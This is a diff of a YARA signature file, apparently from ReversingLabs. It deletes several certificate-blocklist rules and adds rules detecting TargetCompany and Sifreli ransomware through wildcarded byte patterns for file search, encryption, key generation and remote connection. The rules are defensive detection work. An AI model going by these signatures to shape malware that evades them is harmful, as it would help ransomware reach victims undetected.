-rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects TargetCompany ransomware."
 		author = "ReversingLabs"
-		id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062"
+		date = "2021-09-27"
+		modified = "2021-09-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L81-L97"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6"
+		logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TargetCompany"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "b6a1eb97-f0da-571e-951c-57f49cf62057"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L99-L115"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A
+            ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ??
+            ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59
+            E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68
+            ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50
+            89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85
+            ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ??
+            ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50
+        }
+		$encrypt_files_p2 = {
+            56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ??
+            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D
+            ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ??
+            ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ??
+            ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B
+            BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ??
+            ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
+            D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56
+            FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D
+            45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75
+            ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ??
+            B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89
+            4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ??
+            5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF
+            75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ??
+            50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ??
+            ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75
+            ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ??
+            8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45
+            ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75
+            ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33
+            CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$generate_key = {
+            0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53
+            8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ??
+            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7
+            B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ??
+            40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15
+        }
+		$find_files_p1 = {
+            8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7
+            C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5
+        }
+		$find_files_p2 = {
+            FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ??
+            ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ??
+            ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
+            ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0
+            8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59
+            FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B
+            4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Opera Software ASA" and pe.signatures [ i ] . serial == "13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sifreli ransomware."
 		author = "ReversingLabs"
-		id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "974f81e2-6907-54da-97e3-3116c41b5ed4"
+		date = "2020-10-08"
+		modified = "2020-10-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L117-L133"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89"
+		logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sifreli"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ??
+            2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
+            6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15
+            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74
+            ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
+            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ??
+            1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+            EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ??
+            ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B
+            4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A
+            ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ??
+            C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3
+            8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52
+            FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D
+            C3 8B C3 5B 8B E5 5D C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85
+            F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ??
+            56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A
+            ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ??
+            ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3
+        }
+		$remote_connection_p3 = {
+            55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ??
+            51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ??
+            ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38
+            ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33
+            C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D
+            ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51
+            ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ??
+            83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D
+            C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B
+            8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33
+            C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB
+            2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ??
+            8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E
+            5F C3
+        }
+		$encrypt_files_2 = {
+            83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B
+            C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33
+            FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ??
+            56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41
+            ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ??
+            8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ??
+            8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83
+            FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75
+            ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ??
+            8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ??
+            85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8
+            ?? ?? ?? ?? 5D C3
+        }
+		$encrypt_files_3 = {
+            8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB
+            ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83
+            C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IDAutomation.com" and pe.signatures [ i ] . serial == "45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE
